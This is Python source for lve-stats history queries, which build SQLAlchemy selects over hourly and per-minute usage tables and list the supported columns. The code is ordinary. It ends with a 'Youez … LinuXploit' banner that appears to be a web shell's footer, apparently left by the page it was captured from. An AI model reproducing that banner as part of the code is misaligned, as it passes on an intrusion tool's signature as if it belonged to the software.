    def _min_max_created(self):
        """
        SELECT
            MIN(created) AS MinCreated,
            MAX(created) AS MaxCreated
        FROM
            lve_stats2_history
        WHERE
            id = <ID> AND
            created BETWEEN 'xxxx' AND 'yyyy' AND
            server_id = 'localhost';

        The query and the time it took are written to the debug log.

        :return: first fetched row: (min created, max created)
        """
        conditions = and_(self._where_time_period(), self._where_uid(), self._where_server_id())
        created = self.table.c.created
        bounds_query = select([func.min(created), func.max(created)]).where(conditions)
        started_at = time.time()
        rendered = str(bounds_query.compile(compile_kwargs={"literal_binds": True}))
        self.log.debug(rendered.replace('\n', ' '))
        result = self.dbengine.execute(bounds_query)
        self.log.debug('query time: %s', time.time() - started_at)
        fetched = result.fetchall()
        return fetched[0]

    def proceed_dyn_time_unit(self):
        """
        Fetch the data with a time unit chosen per sub-period by dyn_time_unit_groups.

        The sub-periods are derived from the oldest and newest "created" found for the
        current filters and are queried one by one, in reversed order of the list
        returned by dyn_time_unit_groups, each without a row limit.

        :return: list of converted rows; the (unfilled) result corrector when there is no data
        """
        min_created, max_created = self._min_max_created()
        if max_created is None:  # no data
            return self.result_corrector

        # we need manipulate with datetime data in local timezone
        local_from = gm_to_local(unixtimestamp_to_gm_datetime(min_created))
        local_to = gm_to_local(unixtimestamp_to_gm_datetime(max_created))

        collected = []
        for group_from, group_to, group_unit in reversed(dyn_time_unit_groups(local_from, local_to)):
            # work on a shallow copy so that the attributes of this instance stay untouched
            worker = copy.copy(self)
            worker.period_from = gm_datetime_to_unixtimestamp(local_to_gm(group_from))
            worker.period_to = gm_datetime_to_unixtimestamp(local_to_gm(group_to)) - 1
            worker.time_unit = group_unit
            worker.limit = 0
            collected.extend(worker.proceed())
        return collected

    def proceed(self):
        # check and return some data without run sql query
        if self.uid == tuple() or self.uid == []:
            return []
        if self.uid is not None and not isinstance(self.uid, (list, tuple)) and self.uid <= 0:
            return []

        query = self.main_query()
        time_start = time.time()
        q = str(query.compile(compile_kwargs={"literal_binds": True}))
        self.log.debug(q.replace('\n', ' '))
        conn = self.dbengine.connect()
        try:
            cursor = conn.execute(query)
            self.log.debug('query time: %s', time.time() - time_start)
            self.result_corrector.rows = cursor.fetchall()
        except LveStatsPluginTerminated as e:
            conn.close()
            raise LveStatsPluginTerminated() from e
        else:
            conn.close()
            return self.result_corrector

    def proceed_dict(self):
        return [dict(zip(self.show_columns, items_val)) for items_val in self.proceed()]


class _HistoryShowX1(HistoryShow):
    """
    Variant of ``HistoryShow`` that selects plain table columns instead of
    aggregate expressions.

    'ID' is added to ``show_columns`` when it is missing, and the names of the
    columns already selected are remembered in ``self._labels`` so that no
    name is emitted twice.
    """

    def __init__(self, *args, **kwargs):
        HistoryShow.__init__(self, *args, **kwargs)
        if 'ID' not in self.show_columns:
            self.show_columns = ['ID'] + self.show_columns
        # names of columns/labels that were already added to the select list
        self._labels = []

    def _aggregate_fun_case(self, item):
        """
        Translate a field name into the column expression(s) to select for it.

        :type item: str
        :return: a single expression, a list of expressions, or - for
                 'From' / 'To' - the value of ``period_from`` / ``period_to``
        """
        if item == 'anyF':
            # every fault counter of the table
            return [
                self.table.c.mem_fault,
                self.table.c.memphy_fault,
                self.table.c.mep_fault,
                self.table.c.nproc_fault,
                self.table.c.cpu_fault,
                self.table.c.io_fault,
                self.table.c.iops_fault,
            ]
        if item == 'ID':
            return label('id', self.table.c.id)
        if item == 'From':
            return self.period_from
        if item == 'To':
            return self.period_to

        column_name = FIELD_TO_TABLE_COLUMN[item]
        table_column = getattr(self.table.c, column_name)
        if item in (FIELD_AVERAGE + FIELD_LIMIT + FIELD_FAULT):
            expressions = label(column_name, table_column)
        elif item in FIELD_USAGE:
            # usage fields need the matching limit column as well
            limit_name = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_USAGE.index(item)]]
            limit_column = label(limit_name, getattr(self.table.c, limit_name))
            expressions = [table_column, limit_column]
        elif item in FIELD_MAX:
            # maximum fields need the matching limit and fault columns plus a '<name>_max' label
            position = FIELD_MAX.index(item)
            limit_name = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[position]]
            fault_name = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[position]]
            fault_column = label(fault_name, getattr(self.table.c, fault_name))
            limit_column = label(limit_name, getattr(self.table.c, limit_name))
            max_column = label(column_name + '_max', table_column)
            expressions = [table_column, limit_column, fault_column, max_column]
        # NOTE: a field that belongs to none of the groups above leaves
        # `expressions` unassigned, so this return raises UnboundLocalError
        return expressions

    def _columns_query(self):
        """
        Build the list of column expressions for the select statement.

        Besides ``show_columns`` it covers the fields required by ``by_fault``,
        ``by_usage`` and ``order_by``.  Expressions without a ``name`` attribute
        and names that were already emitted are left out.
        """
        wanted = self.show_columns + (self.by_fault or [])
        if self.by_usage:
            for usage_item in convert_to_list(self.by_usage):
                if item_is_average := usage_item in FIELD_AVERAGE:
                    wanted.append(FIELD_USAGE[FIELD_AVERAGE.index(usage_item)])
                if not item_is_average:
                    position = FIELD_MAX.index(usage_item)
                    wanted.extend([FIELD_FAULT[position], usage_item])

        if self.order_by:
            wanted.append(self.order_by)

        selected = []
        for field_name in wanted:
            produced = self._aggregate_fun_case(field_name)
            candidates = produced if isinstance(produced, list) else [produced]
            for candidate in candidates:
                if not hasattr(candidate, 'name'):
                    continue
                if candidate.name in self._labels:  # prevent alias duplication
                    continue
                selected.append(candidate)
                self._labels.append(candidate.name)
        return selected


class _HistoryShowX60(_HistoryShowX1):
    """
    ``_HistoryShowX1`` bound to the ``history_x60`` table.

    On construction the period is replaced with the range reported by
    ``get_history_x60_from_to()`` and the time count is set accordingly.
    """

    # length of one aggregated interval, in seconds
    AGGREGATE_PERIOD = 60 * 60

    def __init__(self, *args, **kwargs):
        _HistoryShowX1.__init__(self, *args, table=history_x60.__table__, **kwargs)

        # replace the requested period with the one present in the aggregate table
        bounds = self.get_history_x60_from_to()
        self.period_from, self.period_to = bounds
        # an explicitly passed (truthy) time count wins over the computed one
        time_count = kwargs.get('time_count')
        if not time_count:
            time_count = self.get_time_count()
        self.time_count = time_count

    def get_time_count(self):
        """
        Return 0 when both period bounds are None, otherwise defer to the
        parent implementation.
        """
        if self.period_from is None and self.period_to is None:
            return 0
        return _HistoryShowX1.get_time_count(self)

    def get_history_x60_from_to(self):
        """
        Work out which part of the requested period is present in the
        aggregate table.

        :return: ``(None, None)`` when the period is not longer than
                 ``AGGREGATE_PERIOD``; otherwise the (from, to) pair derived from
                 the smallest and largest ``created`` found, or the raw query
                 row when the largest value is None
        """
        if self.period_to - self.period_from <= self.AGGREGATE_PERIOD:
            return None, None

        created = self.table.c.created
        in_period = created.between(self.period_from + self.AGGREGATE_PERIOD, self.period_to)
        query = select([func.min(created), func.max(created)]).where(
            and_(in_period, self._where_server_id())
        )
        time_start = time.time()
        compiled = str(query.compile(compile_kwargs={"literal_binds": True}))
        self.log.debug(compiled.replace('\n', ' '))
        result = self.dbengine.execute(query).fetchall()[0]
        self.log.debug('query time: %s', time.time() - time_start)

        create_min, create_max = result
        if create_max is None:
            return result
        # "+1" keeps the boundary timestamp itself out of the range
        return create_min - self.AGGREGATE_PERIOD + 1, create_max

    # average fields are generated differently for this table
    def _aggregate_fun_case(self, item):
        """
        :type item: str
        """
        if item not in FIELD_AVERAGE:
            return _HistoryShowX1._aggregate_fun_case(self, item)
        # average columns are multiplied by the table's `time` column
        column_name = FIELD_TO_TABLE_COLUMN[item]
        average_column = getattr(self.table.c, column_name)
        return label(column_name, average_column * self.table.c.time)


class HistoryShowUnion(HistoryShow):
    """
    Retrieves statistics from two tables at once.

    Two helper objects are built, one for the ``history_x60`` table (``x60``)
    and one for the table handled by ``_HistoryShowX1`` (``x1``).  When a union
    is needed, ``self.table`` is replaced by an aliased UNION ALL of both selects.
    """

    def __init__(self, *args, **kwargs):
        HistoryShow.__init__(self, *args, **kwargs)
        self._alias = LVE_STATS_2_TABLENAME_PREFIX + 'union'
        # both helpers receive the time count computed by this instance
        kwargs["time_count"] = self.time_count
        self.x60 = _HistoryShowX60(*args, **kwargs)
        self.x1 = _HistoryShowX1(*args, **kwargs)
        # a union is needed only if the x60 helper found a period and several uids are involved
        self._need_union = self.x60.period_to is not None and self._is_multi_uids
        if self._need_union:
            self.table = self._select_union_query()

    # maximum fields are computed from the union's own columns
    def _aggregate_fun_case(self, item):
        """
        :type item: str
        """
        if not (self._need_union and item in FIELD_MAX):
            return HistoryShow._aggregate_fun_case(self, item)

        position = FIELD_MAX.index(item)
        max_name = FIELD_TO_TABLE_COLUMN[item] + '_max'
        limit_name = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[position]]
        fault_name = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[position]]
        limit_column = getattr(self.table.c, limit_name)
        fault_column = getattr(self.table.c, fault_name)
        max_column = getattr(self.table.c, max_name)
        return self._fun_max(max_column, limit_column, fault_column)

    def _select_union_query(self):
        """
        Build the aliased UNION ALL of the x1 select (restricted to rows whose
        ``created`` is outside the x60 period) and the x60 select.
        """
        with warnings.catch_warnings():
            # SQLAlchemy warnings are silenced while the statement is assembled
            warnings.simplefilter("ignore", category=sa_exc.SAWarning)
            inside_x60_period = self.x1.table.c.created.between(self.x60.period_from, self.x60.period_to)
            x1_part = self.x1.select_query().where(not_(inside_x60_period))
            combined = x1_part.union_all(self.x60.select_query())
            combined = alias(combined, self._alias)
        return combined

    def select_query(self, columns_=None, need_join=None):
        """
        Return a bare ``select(columns_)`` when the union is in use, otherwise
        the parent's select query.
        """
        if not self._need_union:
            return HistoryShow.select_query(self, columns_=columns_, need_join=need_join)
        return select(columns_)


def get_supported_columns(lve_version=None, mode=None):
    """
    Return the list of column names available for the given output mode.

    The IOPS columns are appended only when ``lve_version`` is None or greater
    than 6.  A mode other than 'v1', 'v2' or None yields an empty list.

    :type mode: Union[None, str]
    :type lve_version: Union[None, int]
    """
    if mode == 'v1':
        base = (
            'aCPU', 'mCPU', 'lCPU',
            'aEP', 'mEP', 'lEP',
            'aVMem', 'mVMem', 'lVMem',
            'VMemF', 'EPf',
            'aPMem', 'mPMem', 'lPMem',
            'aNproc', 'mNproc', 'lNproc',
            'PMemF', 'NprocF',
            'aIO', 'mIO', 'lIO',
        )
        iops = ('aIOPS', 'mIOPS', 'lIOPS')
    elif mode == 'v2':
        base = (
            'aCPU', 'lCPU', 'CPUf',
            'aEP', 'lEP', 'EPf',
            'aVMem', 'lVMem', 'VMemF',
            'aPMem', 'lPMem', 'PMemF',
            'aNproc', 'lNproc', 'NprocF',
            'aIO', 'lIO', 'IOf',
        )
        iops = ('aIOPS', 'lIOPS', 'IOPSf')
    elif mode is None:  # show all columns, v1 and v2
        base = (
            'aCPU', 'uCPU', 'mCPU', 'lCPU', 'CPUf',
            'aEP', 'uEP', 'mEP', 'lEP', 'EPf',
            'aVMem', 'uVMem', 'mVMem', 'lVMem', 'VMemF',
            'aPMem', 'uPMem', 'mPMem', 'lPMem', 'PMemF',
            'aNproc', 'uNproc', 'mNproc', 'lNproc', 'NprocF',
            'aIO', 'uIO', 'mIO', 'lIO', 'IOf',
        )
        iops = ('aIOPS', 'mIOPS', 'uIOPS', 'lIOPS', 'IOPSf')
    else:
        # unknown mode: nothing is supported
        return []

    # always hand out a fresh list so callers may modify it freely
    columns = list(base)
    if lve_version is None or lve_version > 6:
        columns += iops
    return columns

Youez - 2016 - github.com/yon3zu
LinuXploit